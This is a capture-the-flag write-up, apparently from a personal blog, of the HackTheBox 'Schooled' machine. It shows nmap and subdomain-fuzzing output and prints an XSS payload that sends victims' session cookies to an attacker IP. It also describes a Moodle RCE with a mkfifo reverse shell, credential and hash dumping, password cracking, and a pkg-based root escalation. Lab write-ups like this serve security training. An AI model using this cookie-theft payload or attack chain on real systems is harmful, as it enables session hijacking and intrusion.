WackyHacker

WackyHacker

Ethical Hacker | CTF challenge player / Red Teamer 🚩󠁵󠁳󠁴󠁸󠁿󠁵󠁳󠁴󠁸󠁿

Schooled - HackTheBox

I started with an Nmap scan to detect open ports on the machine.

┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# nmap -sS --min-rate=5000 -vvv -n -Pn --open 10.10.10.234 -oN targeted
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 06:18 EDT
Initiating SYN Stealth Scan at 06:18
Scanning 10.10.10.234 [1000 ports]
Discovered open port 22/tcp on 10.10.10.234
Discovered open port 80/tcp on 10.10.10.234
Completed SYN Stealth Scan at 06:18, 0.52s elapsed (1000 total ports)
Nmap scan report for 10.10.10.234
Host is up, received user-set (0.047s latency).
Scanned at 2021-09-18 06:18:46 EDT for 0s
Not shown: 798 filtered ports, 200 closed ports
Reason: 798 no-responses and 200 resets
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh 	syn-ack ttl 63
80/tcp open  http	syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
       	Raw packets sent: 1798 (79.112KB) | Rcvd: 202 (8.088KB)

I did another scan to detect the version of each open port.

┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# nmap -sC -sV -p22,80 10.10.10.234 -oN webScan                    	 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 06:20 EDT
Nmap scan report for 10.10.10.234
Host is up (0.035s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh 	OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open  http	Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.25 seconds

I had two ports open, the first was for the SSH service and the other was a web server, there was little I could do on the first one so I resorted to seeing what was on the web server.

https://imgur.com/LXCKb0F.png

Apparently it was a school page, I investigated it a little more and found the following in the “footer” of the website.

https://imgur.com/Vnl3TCA.png

This caught my attention, I thought that virtual hosting could be applied, that is, hosting different domains on a single ‘IP’, so I entered it in /etc/hosts.

https://imgur.com/9V1ffkh.png

I went back to the website, but there was nothing interesting.

https://imgur.com/LXCKb0F.png

I used whatweb to see if it was running any CMS.

┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# whatweb http://schooled.htb/
http://schooled.htb/ [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge]

Apparently it was the same one, so I did some subdomain fuzzing and found one that caught my attention.

┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# wfuzz -c --hc=404 -u http://schooled.htb/ -H "Host: FUZZ.schooled.htb" -w /usr/share/amass/wordlists/subdomains.lst -t 20 --hw=1555
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                     	*
********************************************************

Target: http://schooled.htb/
Total requests: 8215

=====================================================================
ID       	Response   Lines	Word   	Chars   	Payload                                                                                 	 
=====================================================================

000002430:   400    	10 L 	45 W   	347 Ch  	"ferrari.fortwayne.com."                                                                	 
000004127:   200    	1 L  	5 W    	84 Ch   	"moodle"

Moodle was a subdomain that I was apparently using, I entered it in the /etc/hosts.

https://imgur.com/OShD4Q5.png

And the page tells me something different, it was a moodle.

https://imgur.com/tCieGJx.png

It had a button that said Log In, clicking it redirected me to a login page.

https://imgur.com/dvEEVpA.png

I had no credentials so there was little I could do, but I could register.

https://imgur.com/W3FR84S.png

Once registered, I logged in.

https://imgur.com/OnSim3m.png

Looking at all the subjects that were available, mathematics was the only one that had a user named ‘Manuel Philips’.

https://imgur.com/3VUKpya.png

I found a comment from this user.

Untitled (4) (1)

What caught my attention the most was that it says to verify all users, looking a little more at the page I found this buffer that apparently allowed me to talk to Manuel Philips, I tried to see if it was vulnerable to XSS.

Sin título (1) (2) (1)

And the alert was reported to me on the screen.

https://imgur.com/OpYC8nU.png

Now that I knew it was vulnerable to XSS I remembered the message that said all users would be verified, I thought about performing a Cookie Hijacking, that is, stealing the session cookie of the privileged user, to do this I used the following syntax in JS.

<script>document.location="http://10.10.16.3/value_cookie="+document.cookie</script>

It can actually be done in many ways.

https://imgur.com/upgz0Co.png

I opened a server via Python and received my session cookie via GET plus others that were not mine.

https://imgur.com/gYNFMRR.png

I authenticated with the cookie I received and it seemed to be from the user Manuel Philips, going back to the previous message, I saw that it said something about MoodleNet, I decided to investigate and found a Lanz exploit that guarantees you RCE.

Captura de pantalla (2)

I run it by giving it the session cookie of user Manuel Philips and running a reverse shell through mkfifo and gaining access to the machine.

https://imgur.com/JpUx8Ox.png

Investigating the machine I found a file called config.php that had MySQL credentials.

https://imgur.com/r590xtu.png

Before using MySQL I used the MySQLshow utility to list the databases and their tables.

Qm7IKtT

After enumerating the Moodle database I found a special table called mdl_user, enumerating it I found different columns, but I was especially struck by “username”, “password” and “email”, after enumerating them I was given different hashes of users.

https://imgur.com/CBBvwrR.png

I decided to crack the hashes with john locally and I managed to crack the !QAZ2wsx credential which belonged to the user jamie, as the machine had SSH open I tried to authenticate with these credentials and I accessed, I could now view the user’s “flag”.

NPUMyaN

ESCALADA DE PRIVILEGIOS

Doing sudo -l I saw that I could run pkg as any user.

https://imgur.com/5rV3sG0.png

I headed over to gtfobins and found a payload that allowed me to escalate privileges.

https://imgur.com/EjF0tv9.png

On the victim machine I didn’t have fpm installed, so I did it on my machine, made it grant SUID privileges to bash, transferred it to the victim machine and ran it, and I could now see the root flag.

t7fDsbP

Leave a comment